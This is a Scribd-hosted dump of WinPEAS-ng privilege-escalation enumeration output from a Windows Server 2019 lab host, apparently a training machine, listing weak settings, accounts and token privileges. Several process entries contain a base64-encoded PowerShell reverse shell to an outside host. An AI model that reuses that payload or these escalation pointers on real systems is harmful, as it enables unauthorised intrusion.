0% found this document useful (0 votes)

216 views53 pages

Test

The document provides an overview of a Windows Server 2019 system's configuration and security settings, including user accounts, environment variables, and audit policies. It highlights potential vulnerabilities and misconfigurations, such as the lack of LSA protection and Credential Guard. Additionally, it includes usage guidelines for the WinPEAS-ng tool, emphasizing its intended use for authorized penetration testing and educational purposes only.

Uploaded by

trashmail.armand

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

216 views53 pages

Test

Uploaded by

trashmail.armand

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

((((((((((((((((((((((((((((((((

(((((((((((((((((((((((((((((((((((((((((((

((((((((((((((**********/##########(((((((((((((

((((((((((((********************/#######(((((((((((

((((((((******************/@@@@@/****######((((((((((

((((((********************@@@@@@@@@@/***,####((((((((((

(((((********************/@@@@@%@@@@/********##(((((((((

(((############*********/%@@@@@@@@@/************((((((((

((##################(/******/@@@@@/***************((((((

((#########################(/**********************(((((

((##############################(/*****************(((((

((###################################(/************(((((

((#######################################(*********(((((

((#######(,.***.,(###################(..***.*******(((((

((#######*(#####((##################((######/(*****(((((

((###################(/***********(##############()(((((

(((#####################/*******(################)((((((

((((############################################)((((((

(((((##########################################)(((((((

((((((########################################)(((((((

((((((((####################################)((((((((

(((((((((#################################)(((((((((

((((((((((##########################)(((((((((

((((((((((((((((((((((((((((((((((((((

((((((((((((((((((((((((((((((

ADVISORY: winpeas should be used for authorized penetration testing and/or

educational purposes only.Any misuse of this software will not be the
responsibility of the author or of any other collaborator. Use it at your own
devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live

/---------------------------------------------------------------------------
------\
| Do you like PEASS?
|

|---------------------------------------------------------------------------------|

| Learn Cloud Hacking : training.hacktricks.xyz

|---------------------------------------------------------------------------------|

| Thank you!
|
\---------------------------------------------------------------------------
------/

[+] Legend:
Red Indicates a special privilege over an object or
something is misconfigured
Green Indicates that some protection is enabled or something
is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links

You can find a Windows local PE Checklist here:

https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-
escalation.html

Creating Dynamic lists, this could take a while, please wait...

- Loading sensitive_files yaml definitions file...

- Loading regexes yaml definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list (local only)...
- Creating disabled users list...
- Admin users list...
- Creating AppLocker bypass list...
- Creating files/directories list for search...

????????????????????????????????????? System
Information ?????????????????????????????????????

???????????? Basic System Information

? Check if the Windows versions is vulnerable to some known exploit
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#version-exploits
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hostname: Archetype
ProductName: Windows Server 2019 Standard
EditionID: ServerStandard
ReleaseId: 1809
BuildBranch: rs5_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 3/7/2025 12:33:43 PM
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB5004335 (7/27/2021), KB5003711 (7/26/2021), KB5004244 (7/27/2021),

???????????? Showing All Microsoft Updates

[X] Exception: Exception has been thrown by the target of an invocation.

???????????? System Last Shutdown Date/time (from Registry)

Last Shutdown Date/time : 10/14/2021 1:19:25 AM

???????????? User Environment Variables

? Check for some passwords or keys in the env variables
COMPUTERNAME: ARCHETYPE
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Users\sql_svc\AppData\Local
PSModulePath: C:\Users\sql_svc\Documents\WindowsPowerShell\Modules;C:\Program
Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\
Modules;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\PowerShell\Modules\
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\
System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\
Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\;C:\Program Files (x86)\
Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\
Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\DTS\Binn\;C:\Users\sql_svc\
AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\sql_svc
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
COMPLUS_MDA:
InvalidVariant;RaceOnRCWCleanup;InvalidFunctionPointerInDelegate;InvalidMemberDecla
ration;ReleaseHandleFailed;MarshalCleanupError;ReportAvOnComRelease;DangerousThread
ingAPI;invalidOverlappedToPinvoke
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\sql_svc\AppData\Local\Temp
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\sql_svc\AppData\Roaming
TMP: C:\Users\sql_svc\AppData\Local\Temp
USERNAME: sql_svc
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: ARCHETYPE

???????????? System Environment Variables

? Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\
System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\
Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\;C:\Program Files (x86)\
Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\
Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\DTS\Binn\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\
WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\140\
Tools\PowerShell\Modules\
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101

???????????? Audit Settings

? Check what is being logged
Not Found

???????????? Audit Policy Settings - Classic & Advanced

???????????? WEF Settings

? Windows Event Forwarding, is interesting to know were are sent the logs
Not Found

???????????? LAPS Settings

? If installed, local administrator password is changed frequently and is
restricted by ACL
LAPS Enabled: LAPS not installed

???????????? Wdigest
? If enabled, plain-text crds could be stored in LSASS
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#wdigest

Wdigest is not enabled

???????????? LSA Protection

? If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI,
RunAsPPL cannot be disabled by deleting the registry key)
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#lsa-protection

LSA Protection is not enabled

???????????? Credentials Guard

? If enabled, a driver is needed to read LSASS memory
https://book.hacktricks.wiki/windows-hardening/stealing-credentials/credentials-
protections#credentials-guard

CredentialGuard is not enabled

Virtualization Based Security Status: Not enabled
Configured: False
Running: False

???????????? Cached Creds

? If > 0, credentials will be cached in the registry and accessible by SYSTEM user
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#cached-credentials
cachedlogonscount is 10

???????????? Enumerating saved credentials in Registry (CurrentPass)

???????????? AV Information
[X] Exception: Invalid namespace
No AV was detected!!
Not Found

???????????? Windows Defender configuration

Local Settings
Group Policy Settings

???????????? UAC Status

? If you are in the Administrators group check how to bypass the UAC
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-
bypasss

ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.

???????????? PowerShell Settings

PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\
PSReadLine\ConsoleHost_history.txt
PS history size: 79B

???????????? Enumerating PowerShell Session Settings using the registry

You must be an administrator to run this check

???????????? PS default transcripts history

? Read the PS history inside these files (if any)

???????????? HKCU Internet Settings

DisableCachingOfSSLPages: 0
IE5_UA_Backup_Flag: 5.0
PrivacyAdvanced: 1
SecureProtocols: 2688
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
CertificateRevocation: 1
ZonesSecurityUpgrade: System.Byte[]
EnableNegotiate: 1
ProxyEnable: 0

???????????? HKLM Internet Settings

EnablePunycode: 1

???????????? Drives Information

? Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 9 GB)(Permissions: Users
[AppendData/CreateDirectories])

???????????? Checking WSUS

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#wsus
Not Found

???????????? Checking KrbRelayUp

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#krbrelayupp
The system isn't inside a domain, so it isn't vulnerable

???????????? Checking If Inside Container

? If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container

???????????? Checking AlwaysInstallElevated

? https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#alwaysinstallelevated

AlwaysInstallElevated isn't available

???????????? Enumerate LSA settings - auth packages included

auditbasedirectories : 0
auditbaseobjects : 0
Bounds : 00-30-00-00-00-20-00-00
crashonauditfail : 0
fullprivilegeauditing : 00
LimitBlankPasswordUse : 1
NoLmHash : 1
Security Packages : ""
Notification Packages : scecli
Authentication Packages : msv1_0
SecureBoot : 1
LsaPid : 620
LsaCfgFlagsDefault : 0
ProductType : 7
disabledomaincreds : 0
everyoneincludesanonymous : 0
forceguest : 0
restrictanonymous : 0
restrictanonymoussam : 1

???????????? Enumerating NTLM Settings

LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)

NTLM Signing Settings

ClientRequireSigning : False
ClientNegotiateSigning : True
ServerRequireSigning : False
ServerNegotiateSigning : False
LdapSigning : Negotiate signing (Negotiate signing)

Session Security

NTLMMinClientSec : 536870912 (Require 128-bit encryption)

NTLMMinServerSec : 536870912 (Require 128-bit encryption)

NTLM Auditing and Restrictions

InboundRestrictions : (Not defined)

OutboundRestrictions : (Not defined)
InboundAuditing : (Not defined)
OutboundExceptions :

???????????? Display Local Group Policy settings - local users/machine

???????????? Checking AppLocker effective policy

AppLockerPolicy version: 1
listing rules:

???????????? Enumerating Printers (WMI)

???????????? Enumerating Named Pipes

Name
CurrentUserPerms Sddl

eventlog
Everyone [WriteData/CreateFiles]
O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-
1860270145-482643319-2788375705-1540778122)

sql\query
Everyone [WriteData/CreateFiles], sql_svc [AppendData/CreateDirectories] O:S-1-5-
21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-
513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)

SQLLocal\MSSQLSERVER
Everyone [WriteData/CreateFiles], sql_svc [AppendData/CreateDirectories] O:S-1-5-
21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-
513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)

vgauth-service
Everyone [WriteData/CreateFiles]
O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)

???????????? Enumerating AMSI registered providers

Provider: {2781761E-28E0-4109-99FE-B9D127C57AFE}
Path:

===================================================================================
==============

???????????? Enumerating Sysmon configuration

You must be an administrator to run this check

???????????? Enumerating Sysmon process creation logs (1)

You must be an administrator to run this check

???????????? Installed .NET versions

CLR Versions
4.0.30319

.NET Versions

4.7.03190

.NET & AMSI (Anti-Malware Scan Interface) support

.NET version supports AMSI : False

OS supports AMSI : True

????????????????????????????????????? Interesting Events

information ?????????????????????????????????????

???????????? Printing Explicit Credential Events (4648) for last 30 days - A

process logged on using plaintext credentials

You must be an administrator to run this check

???????????? Printing Account Logon Events (4624) for the last 10 days.
You must be an administrator to run this check

???????????? Process creation events - searching logs (EID 4688) for sensitive
data.

You must be an administrator to run this check

???????????? PowerShell events - script block logs (EID 4104) - searching for
sensitive data.

???????????? Displaying Power off/on events for last 5 days

3/7/2025 8:06:26 AM : Startup

????????????????????????????????????? Users
Information ?????????????????????????????????????

???????????? Users
? Check if you have some admin equivalent privileges
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#users--groups

Current user: sql_svc

Current groups: Domain Users, Everyone, Users, Builtin\Performance Monitor Users,
Service, Console Logon, Authenticated Users, This Organization, Local account,
MSSQLSERVER, Local, NTLM Authentication

===================================================================================
==============

ARCHETYPE\Administrator: Built-in account for administering the computer/domain

|->Groups: Administrators
|->Password: CanChange-NotExpi-Req

ARCHETYPE\DefaultAccount(Disabled): A user account managed by the system.

|->Groups: System Managed Accounts Group
|->Password: CanChange-NotExpi-NotReq

ARCHETYPE\Guest: Built-in account for guest access to the computer/domain

|->Groups: Guests
|->Password: NotChange-NotExpi-NotReq

ARCHETYPE\sql_svc
|->Groups: Users
|->Password: CanChange-NotExpi-Req

ARCHETYPE\WDAGUtilityAccount(Disabled): A user account managed and used by the

system for Windows Defender Application Guard scenarios.
|->Password: CanChange-Expi-Req

???????????? Current User Idle Time

Current User : ARCHETYPE\sql_svc
Idle Time : 03h:27m:20s:390ms

???????????? Display Tenant information (DsRegCmd.exe /status)

???????????? Current Token privileges

? Check if you can escalate privilege using some enabled token
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#token-manipulation

SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED

???????????? Clipboard text

???????????? Logged users

NT SERVICE\SQLTELEMETRY
ARCHETYPE\sql_svc

???????????? Display information about local users

Computer Name : ARCHETYPE
User Name : Administrator
User Id : 500
Is Enabled : True
User Type : Administrator
Comment : Built-in account for administering the
computer/domain
Last Logon : 10/14/2021 1:12:47 AM
Logons Count : 23
Password Last Set : 3/17/2020 1:37:03 AM

===================================================================================
==============

Computer Name : ARCHETYPE

User Name : DefaultAccount
User Id : 503
Is Enabled : False
User Type : Guest
Comment : A user account managed by the system.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM

===================================================================================
==============

Computer Name : ARCHETYPE

User Name : Guest
User Id : 501
Is Enabled : True
User Type : Guest
Comment : Built-in account for guest access to the
computer/domain
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/20/2020 3:59:49 AM

===================================================================================
==============

Computer Name : ARCHETYPE

User Name : sql_svc
User Id : 1001
Is Enabled : True
User Type : User
Comment :
Last Logon : 3/7/2025 12:28:31 PM
Logons Count : 24
Password Last Set : 1/19/2020 3:05:12 PM

===================================================================================
==============

Computer Name : ARCHETYPE

User Name : WDAGUtilityAccount
User Id : 504
Is Enabled : False
User Type : Guest
Comment : A user account managed and used by the system for
Windows Defender Application Guard scenarios.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM

===================================================================================
==============

???????????? RDP Sessions

Not Found

???????????? Ever logged users

NT SERVICE\SQLTELEMETRY
ARCHETYPE\Administrator
ARCHETYPE\sql_svc

???????????? Home folders found

C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Service [WriteData/CreateFiles]
C:\Users\sql_svc : sql_svc [AllAccess]

???????????? Looking for AutoLogon credentials

Not Found

???????????? Password Policies

? Check for a possible brute-force
Domain: Builtin
SID: S-1-5-32
MaxPasswordAge: 42.22:47:31.7437440
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: 0

===================================================================================
==============

Domain: ARCHETYPE
SID: S-1-5-21-1479773013-2644727484-962428355
MaxPasswordAge: 42.00:00:00
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: DOMAIN_PASSWORD_COMPLEX

===================================================================================
==============

???????????? Print Logon Sessions

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 77893
Logon Time:
Logon Type: Service
Start Time: 3/7/2025 8:06:33 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 8:06:33 AM
User Name: sql_svc
User Principal Name:
User SID:

===================================================================================
==============

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 335452
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 8:09:57 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 8:09:57 AM
User Name: sql_svc
User Principal Name:
User SID:

===================================================================================
==============

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 6233225
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 12:28:31 PM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 12:28:31 PM
User Name: sql_svc
User Principal Name:
User SID:

===================================================================================
==============

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 4227863
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 10:30:13 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 10:30:13 AM
User Name: sql_svc
User Principal Name:
User SID:

===================================================================================
==============

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 544125
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 8:17:23 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 8:17:23 AM
User Name: sql_svc
User Principal Name:
User SID:

===================================================================================
==============

????????????????????????????????????? Processes
Information ?????????????????????????????????????

???????????? Interesting Processes -non Microsoft-

? Check if any interesting processes for memory dump or if you could overwrite some
binary running https://book.hacktricks.wiki/en/windows-hardening/windows-local-
privilege-escalation/index.html#running-processes
cmd(2396)[C:\Windows\system32\cmd.exe] -- POwn: sql_svc
Command Line: "C:\Windows\system32\cmd.exe" /c powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==

===================================================================================
==============

powershell(1216)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] --
POwn: sql_svc
Command Line: powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==

===================================================================================
==============

conhost(608)[C:\Windows\system32\conhost.exe] -- POwn: sql_svc

Command Line: \??\C:\Windows\system32\conhost.exe 0x4

===================================================================================
==============
cmd(2472)[C:\Windows\system32\cmd.exe] -- POwn: sql_svc
Command Line: "C:\Windows\system32\cmd.exe" /c powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==

===================================================================================
==============

cmd(1948)[C:\Windows\system32\cmd.exe] -- POwn: sql_svc

Command Line: "C:\Windows\system32\cmd.exe" /c powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
